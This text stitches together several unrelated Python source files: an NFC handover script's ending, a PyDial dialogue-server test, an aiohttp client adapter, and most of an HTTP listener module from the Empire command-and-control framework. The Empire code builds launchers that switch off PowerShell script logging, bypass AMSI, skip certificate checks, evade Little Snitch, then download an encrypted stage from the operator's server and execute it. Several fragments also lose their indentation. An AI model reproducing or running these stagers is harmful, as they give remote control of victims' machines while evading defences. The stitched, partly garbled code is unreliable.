                        help='verbose debug output')
    parser.add_argument('-q', const=logging.WARNING, action='store_const',
                        dest='loglevel', help='be quiet')
    parser.add_argument('--only-one', '-1', action='store_true',
                        help='run only one operation and exit')
    parser.add_argument('--init-on-touch', '-I', action='store_true',
                        help='initiate handover on touch')
    parser.add_argument('--no-wait', action='store_true',
                        help='do not wait for tag to be removed before exiting')
    parser.add_argument('--ifname', '-i',
                        help='network interface name')
    parser.add_argument('--no-input', '-a', action='store_true',
                        help='do not use stdout input to initiate handover')
    parser.add_argument('--tag-read-only', '-t', action='store_true',
                        help='tag read only (do not allow connection handover)')
    parser.add_argument('--handover-only', action='store_true',
                        help='connection handover only (do not allow tag read)')
    parser.add_argument('--summary',
                        help='summary file for writing status updates')
    parser.add_argument('--success',
                        help='success file for writing success update')
    parser.add_argument('--device', default='usb', help='NFC device to open')
    parser.add_argument('--chan', default='81/1', help='channel list')
    parser.add_argument('command', choices=['write-nfc-uri',
                                            'write-nfc-hs'],
                        nargs='?')
    args = parser.parse_args()
    print(args)

    # Publish parsed options through the module globals used by callbacks.
    global only_one
    only_one = args.only_one

    global no_wait
    no_wait = args.no_wait

    global chanlist
    chanlist = args.chan

    logging.basicConfig(level=args.loglevel)

    global init_on_touch
    init_on_touch = args.init_on_touch

    if args.ifname:
        global ifname
        ifname = args.ifname
        print("Selected ifname " + ifname)

    if args.summary:
        global summary_file
        summary_file = args.summary

    if args.success:
        global success_file
        success_file = args.success

    if args.no_input:
        global no_input
        no_input = True

    # Fix: previously a second ContactlessFrontend was created at function
    # entry and immediately leaked (never opened or closed); create the
    # frontend only once, right before it is used.
    clf = nfc.ContactlessFrontend()
    global wait_connection

    try:
        if not clf.open(args.device):
            print("Could not open connection with an NFC device")
            raise SystemExit

        if args.command == "write-nfc-uri":
            write_nfc_uri(clf, wait_remove=not args.no_wait)
            raise SystemExit

        if args.command == "write-nfc-hs":
            write_nfc_hs(clf, wait_remove=not args.no_wait)
            raise SystemExit

        global continue_loop
        while continue_loop:
            clear_raw_mode()
            print("\rWaiting for a tag or peer to be touched")
            wait_connection = True
            try:
                if args.tag_read_only:
                    if not clf.connect(rdwr={'on-connect': rdwr_connected}):
                        break
                elif args.handover_only:
                    if not clf.connect(llcp={'on-startup': llcp_startup,
                                             'on-connect': llcp_connected,
                                             'on-release': llcp_release},
                                       terminate=terminate_loop):
                        break
                else:
                    if not clf.connect(rdwr={'on-connect': rdwr_connected},
                                       llcp={'on-startup': llcp_startup,
                                             'on-connect': llcp_connected,
                                             'on-release': llcp_release},
                                       terminate=terminate_loop):
                        break
            except Exception as e:
                print("clf.connect failed: " + str(e))
                break

        global srv
        if only_one and srv and srv.success:
            raise SystemExit
    except KeyboardInterrupt:
        raise SystemExit
    finally:
        clf.close()

    raise SystemExit

if __name__ == '__main__':
    main()
|
test_DialogueServer.py | ###############################################################################
# PyDial: Multi-domain Statistical Spoken Dialogue System Software
###############################################################################
#
# Copyright 2015 - 2017
# Cambridge University Engineering Department Dialogue Systems Group
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
'''
************************
**test_DialogueServer.py** - test DialogueServer()
================================================================================
Use *utils/dummyDialogueServerClient* to create multiprocess instances of a fake
client which communicate concurrently with a running dialogue server in a separate process.
'''
import os,sys
curdir = os.path.dirname(os.path.realpath(__file__))
curdir = curdir.split('/')
curdir = '/'.join(curdir[:-1]) +'/'
os.chdir(curdir)
sys.path.append(curdir)
#from nose.tools import with_setup
from ontology import Ontology
from utils import Settings, dummyDialogueServerClient, ContextLogger
import multiprocessing as mp
import DialogueServer
import time
class TDialogueServer():
    """Test harness: runs DialogueServer in a child process and drives it
    with concurrent fake clients (Python 2; uses the builtin reload()).
    """
    def __init__(self):
        # Initialise Settings and logging from the test config before
        # anything else touches the global configuration.
        cfg = 'tests/test_configs/dialogueserver.cfg'
        assert(os.path.exists(cfg))
        Settings.init(config_file=cfg)
        ContextLogger.createLoggingHandlers(config=Settings.config)

    def ds(self):
        # Child-process target: rebuild the ontology and run the server
        # until the parent terminates the process.
        reload(Ontology.FlatOntologyManager)
        Ontology.init_global_ontology()
        dial_server = DialogueServer.DialogueServer()
        dial_server.run()

    def test_dialogueserver(self):
        '''Create a DialogueServer and a few dummy clients
        '''
        p = mp.Process(target=self.ds)
        p.start()
        # Fake clients talk to the server concurrently; terminate() stops
        # the (otherwise endless) server process once the dialogs finish.
        dummyDialogueServerClient.run_fake_clients(NUM_CLIENTS=3,pause_time=0,DIALOGS_PER_CLIENT=1)
        p.terminate()
def Test():
    # Python 2 entry point for running this test module directly.
    test = TDialogueServer()
    print "\nExecuting tests in",test.__class__.__name__
    test.test_dialogueserver()
    print "Done"

if __name__ == '__main__':
    Test()

#END OF FILE
|
aiohttp_.py | """
This module defines an :py:class:`aiohttp.ClientSession` adapter
that returns awaitable responses.
"""
# Standard library imports
import atexit
import asyncio
import collections
import threading
from concurrent import futures
from functools import partial
# Third party imports
try:
import aiohttp
except ImportError: # pragma: no cover
aiohttp = None
# Local imports
from uplink.clients import helpers, interfaces, register
def threaded_callback(callback):
    """Adapt a synchronous callback so it can be awaited as a coroutine.

    The response body is prefetched on the event loop (response.text()),
    the callback then runs with a ThreadedResponse proxy whose coroutine
    attributes block instead of awaiting, and any proxy returned by the
    callback is unwrapped back to the raw aiohttp response.
    """
    coroutine_callback = asyncio.coroutine(callback)

    @asyncio.coroutine
    def new_callback(response):
        # Prefetch the payload while still on the event loop thread.
        yield from response.text()
        response = ThreadedResponse(response)
        response = yield from coroutine_callback(response)
        if isinstance(response, ThreadedResponse):
            return response.unwrap()
        else:
            return response

    return new_callback
class AiohttpClient(interfaces.HttpClientAdapter):
    """
    An :py:mod:`aiohttp` client that creates awaitable responses.

    Note:
        This client is an optional feature and requires the :py:mod:`aiohttp`
        package. For example, here's how to install this extra using pip::

            $ pip install uplink[aiohttp]

    Args:
        session (:py:class:`aiohttp.ClientSession`, optional):
            The session that should handle sending requests. If this
            argument is omitted or set to :py:obj:`None`, a new session
            will be created.
    """

    # TODO: Update docstrings to include aiohttp constructor parameters.

    # Holds deferred ClientSession constructor arguments until the session
    # can be built lazily inside a coroutine (see create()/session()).
    __ARG_SPEC = collections.namedtuple("__ARG_SPEC", "args kwargs")

    def __init__(self, session=None, **kwargs):
        if aiohttp is None:
            raise NotImplementedError("aiohttp is not installed.")
        if session is None:
            # Defer construction: _create_session returns an __ARG_SPEC.
            session = self._create_session(**kwargs)
        self._session = session
        self._sync_callback_adapter = threaded_callback

    def create_request(self):
        # Factory for a single awaitable request bound to this client.
        return Request(self)

    @asyncio.coroutine
    def session(self):
        """Returns the underlying `aiohttp.ClientSession`."""
        if isinstance(self._session, self.__ARG_SPEC):
            args, kwargs = self._session
            self._session = aiohttp.ClientSession(*args, **kwargs)
            # aiohttp v3.0 has made ClientSession.close a coroutine,
            # so we check whether it is one here and register it
            # to run appropriately at exit
            if asyncio.iscoroutinefunction(self._session.close):
                atexit.register(
                    partial(
                        asyncio.get_event_loop().run_until_complete,
                        self._session.close(),
                    )
                )
            else:
                atexit.register(self._session.close)
        return self._session

    def wrap_callback(self, callback):
        # Synchronous callbacks are adapted so they can be awaited.
        if not asyncio.iscoroutinefunction(callback):
            callback = self._sync_callback_adapter(callback)
        return callback

    @staticmethod
    @register.handler
    def with_session(session, *args, **kwargs):
        """
        Builds a client instance if the first argument is a
        :py:class:`aiohttp.ClientSession`. Otherwise, return :py:obj:`None`.
        """
        if isinstance(session, aiohttp.ClientSession):
            return AiohttpClient(session, *args, **kwargs)

    @classmethod
    def _create_session(cls, *args, **kwargs):
        # Capture the arguments without constructing the session yet.
        return cls.__ARG_SPEC(args, kwargs)

    @classmethod
    def create(cls, *args, **kwargs):
        """
        Builds a client instance with
        :py:class:`aiohttp.ClientSession` arguments.

        Instead of directly initializing this class with a
        :py:class:`aiohttp.ClientSession`, use this method to have the
        client lazily construct a session when sending the first
        request. Hence, this method guarantees that the creation of the
        underlying session happens inside of a coroutine.

        Args:
            *args: positional arguments that
                :py:class:`aiohttp.ClientSession` takes.
            **kwargs: keyword arguments that
                :py:class:`aiohttp.ClientSession` takes.
        """
        session_build_args = cls._create_session(*args, **kwargs)
        return AiohttpClient(session=session_build_args)
class Request(helpers.ExceptionHandlerMixin, interfaces.Request):
    """A single awaitable HTTP request bound to an AiohttpClient."""

    def __init__(self, client):
        self._client = client
        self._callback = None  # optional response transformer set via add_callback

    @asyncio.coroutine
    def send(self, method, url, extras):
        """Send the request; returns the (possibly callback-transformed) response."""
        session = yield from self._client.session()
        # Only the network call is guarded by the exception handler mixin.
        with self._exception_handler:
            response = yield from session.request(method, url, **extras)
        if self._callback is not None:
            response = yield from self._callback(response)
        return response

    def add_callback(self, callback):
        # The client wraps synchronous callbacks so they can be awaited.
        self._callback = self._client.wrap_callback(callback)
class ThreadedCoroutine(object):
    """Wraps a coroutine function so that calling it runs the coroutine to
    completion on a throwaway AsyncioExecutor and returns its result
    synchronously."""

    def __init__(self, coroutine):
        self.__coroutine = coroutine

    def __call__(self, *args, **kwargs):
        with AsyncioExecutor() as executor:
            pending = executor.submit(self.__coroutine, *args, **kwargs)
            return pending.result()
class ThreadedResponse(object):
    """Attribute proxy over a response object.

    Coroutine-function attributes are replaced with blocking
    ThreadedCoroutine wrappers; everything else is passed through
    unchanged. unwrap() recovers the original response.
    """

    def __init__(self, response):
        self.__response = response

    def __getattr__(self, item):
        attribute = getattr(self.__response, item)
        if asyncio.iscoroutinefunction(attribute):
            attribute = ThreadedCoroutine(attribute)
        return attribute

    def unwrap(self):
        """Return the wrapped response object."""
        return self.__response
class AsyncioExecutor(futures.Executor):
    """
    Executor that runs asyncio coroutines in a shadow thread.

    Credit to Vincent Michel, who wrote the original implementation:
    https://gist.github.com/vxgmichel/d16e66d1107a369877f6ef7e646ac2e5
    """

    def __init__(self):
        # A dedicated event loop runs forever on a background thread;
        # submit() schedules coroutines onto it from the caller's thread.
        self._loop = asyncio.new_event_loop()
        self._thread = threading.Thread(target=self._target)
        self._thread.start()

    def _target(self):
        # Background thread body: adopt the loop and spin it.
        asyncio.set_event_loop(self._loop)
        self._loop.run_forever()

    def submit(self, fn, *args, **kwargs):
        """Schedule coroutine function fn on the shadow loop.

        Returns a concurrent.futures.Future for the coroutine's result.
        """
        coro = fn(*args, **kwargs)
        return asyncio.run_coroutine_threadsafe(coro, self._loop)

    def shutdown(self, wait=True):
        # Stop the loop from its own thread, then optionally join.
        self._loop.call_soon_threadsafe(self._loop.stop)
        if wait:  # pragma: no cover
            self._thread.join()
|
http.py | import logging
import base64
import random
import os
import ssl
import time
import copy
from pydispatch import dispatcher
from flask import Flask, request, make_response
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
class Listener:
def __init__(self, mainMenu, params=[]):
    # NOTE(review): mutable default argument `params=[]` is shared across
    # calls; kept for interface compatibility, but None + a local list
    # would be safer.

    # Static metadata describing this listener module.
    self.info = {
        'Name': 'HTTP[S]',
        'Author': ['@harmj0y'],
        'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
        'Category' : ('client_server'),
        'Comments': []
    }

    # any options needed by the stager, settable during runtime
    self.options = {
        # format:
        #   value_name : {description, required, default_value}
        'Name' : {
            'Description' : 'Name for the listener.',
            'Required'    : True,
            'Value'       : 'http'
        },
        'Host' : {
            'Description' : 'Hostname/IP for staging.',
            'Required'    : True,
            'Value'       : "http://%s:%s" % (helpers.lhost(), 80)
        },
        'BindIP' : {
            'Description' : 'The IP to bind to on the control server.',
            'Required'    : True,
            'Value'       : '0.0.0.0'
        },
        'Port' : {
            'Description' : 'Port for the listener.',
            'Required'    : True,
            'Value'       : 80
        },
        'Launcher' : {
            'Description' : 'Launcher string.',
            'Required'    : True,
            'Value'       : 'powershell -noP -sta -w 1 -enc '
        },
        'StagingKey' : {
            'Description' : 'Staging key for initial agent negotiation.',
            'Required'    : True,
            'Value'       : '2c103f2c4ed1e59c0b4e2e01821770fa'
        },
        'DefaultDelay' : {
            'Description' : 'Agent delay/reach back interval (in seconds).',
            'Required'    : True,
            'Value'       : 5
        },
        'DefaultJitter' : {
            'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
            'Required'    : True,
            'Value'       : 0.0
        },
        'DefaultLostLimit' : {
            'Description' : 'Number of missed checkins before exiting',
            'Required'    : True,
            'Value'       : 60
        },
        'DefaultProfile' : {
            'Description' : 'Default communication profile for the agent.',
            'Required'    : True,
            'Value'       : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
        },
        'CertPath' : {
            'Description' : 'Certificate path for https listeners.',
            'Required'    : False,
            'Value'       : ''
        },
        'KillDate' : {
            'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
            'Required'    : False,
            'Value'       : ''
        },
        'WorkingHours' : {
            'Description' : 'Hours for the agent to operate (09:00-17:00).',
            'Required'    : False,
            'Value'       : ''
        },
        'ServerVersion' : {
            'Description' : 'Server header for the control server.',
            'Required'    : True,
            'Value'       : 'Microsoft-IIS/7.5'
        }
    }

    # required:
    self.mainMenu = mainMenu
    self.threads = {}

    # optional/specific for this module
    self.app = None
    # URIs come from the first |-separated field of the default profile.
    self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]

    # set the default staging key to the controller db default
    self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
def default_response(self):
    """
    Returns a default HTTP server page.
    """
    # Mimic a stock Apache-style placeholder page for casual visitors.
    fragments = ["<html><body><h1>It works!</h1>",
                 "<p>This is the default web page for this server.</p>",
                 "<p>The web server software is running but no content has been added, yet.</p>",
                 "</body></html>"]
    return ''.join(fragments)
def validate_options(self):
    """
    Validate all options for this listener.

    Returns True when every required option has a non-empty value,
    otherwise prints the offending option name and returns False.
    """
    # Refresh the URI list from the (possibly updated) default profile.
    self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]

    for key in self.options:
        if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
            print helpers.color("[!] Option \"%s\" is required." % (key))
            return False

    return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = ''
if safeChecks.lower() == 'true':
# ScriptBlock Logging bypass
stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
stager += helpers.randomize_capitalization("$GroupPolicySettings")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy;")
stager += helpers.randomize_capitalization("$proxy.Address = '"+ proxy.lower() +"';")
stager += helpers.randomize_capitalization("$wc.Proxy = $proxy;")
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
domain = username.split('\\')[0]
usr = username.split('\\')[1]
stager += "$netcred = New-Object System.Net.NetworkCredential("+usr+","+password+","+domain+");"
stager += helpers.randomize_capitalization("$wc.Proxy.Credentials = $netcred;")
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$wc.Headers.Add(")
stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
stager += "$ser='%s';$t='%s';" % (host, stage0)
stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out = ps.stdout.read()\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"session=%s\");\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,"+proxy+","+username+","+password+");\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
    """
    Generate the stager code needed for communications with this listener.

    Reads the language-specific stager template from disk, patches in the
    listener's host/staging-key/URI values, and returns it either raw,
    base64-encoded (encode=True), or RC4-encrypted with a random 4-byte IV
    prepended (encrypt=True). Returns None if no language was given.
    """
    if not language:
        print helpers.color('[!] listeners/http generate_stager(): no language specified!')
        return None
    # pull the listener options that get patched into the stager template
    profile = listenerOptions['DefaultProfile']['Value']
    uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
    # NOTE(review): 'launcher' is read but never used in this method
    launcher = listenerOptions['Launcher']['Value']
    stagingKey = listenerOptions['StagingKey']['Value']
    workingHours = listenerOptions['WorkingHours']['Value']
    host = listenerOptions['Host']['Value']
    # anything after the second '|' in the profile is custom HTTP headers
    customHeaders = profile.split('|')[2:]
    # select some random URIs for staging from the main profile
    stage1 = random.choice(uris)
    stage2 = random.choice(uris)
    if language.lower() == 'powershell':
        # read in the stager base
        f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
        stager = f.read()
        f.close()
        # make sure the server ends with "/"
        if not host.endswith("/"):
            host += "/"
        # patch in custom headers, if any were specified in the profile
        if customHeaders != []:
            headers = ','.join(customHeaders)
            stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
        # patch in working hours, if any
        if workingHours != "":
            stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
        # patch the server and key information
        stager = stager.replace('REPLACE_SERVER', host)
        stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
        # the template uses index.jsp/index.php as placeholders for the two staging URIs
        stager = stager.replace('index.jsp', stage1)
        stager = stager.replace('index.php', stage2)
        randomizedStager = ''
        for line in stager.split("\n"):
            line = line.strip()
            # skip commented line
            if not line.startswith("#"):
                # randomize capitalization of lines without quoted strings
                # (PowerShell is case-insensitive, so this is behavior-preserving)
                if "\"" not in line:
                    randomizedStager += helpers.randomize_capitalization(line)
                else:
                    randomizedStager += line
        if obfuscate:
            randomizedStager = helpers.obfuscate(randomizedStager, obfuscationCommand=obfuscationCommand)
        # base64 encode the stager and return it
        if encode:
            return helpers.enc_powershell(randomizedStager)
        elif encrypt:
            # RC4 with a random 4-byte IV prepended to the ciphertext
            RC4IV = os.urandom(4)
            return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
        else:
            # otherwise just return the case-randomized stager
            return randomizedStager
    elif language.lower() == 'python':
        # read in the stager base
        f = open("%s/data/agent/stagers/http.py" % (self.mainMenu.installPath))
        stager = f.read()
        f.close()
        stager = helpers.strip_python_comments(stager)
        # the Python stager expects the host WITHOUT a trailing slash
        if host.endswith("/"):
            host = host[0:-1]
        # # patch the server and key information
        stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
        stager = stager.replace("REPLACE_PROFILE", profile)
        stager = stager.replace("index.jsp", stage1)
        stager = stager.replace("index.php", stage2)
        # # base64 encode the stager and return it
        if encode:
            return base64.b64encode(stager)
        if encrypt:
            # return an encrypted version of the stager ("normal" staging)
            RC4IV = os.urandom(4)
            return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
        else:
            # otherwise return the standard stager
            return stager
    else:
        print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
    """
    Generate just the agent communication code block needed for communications with this listener.
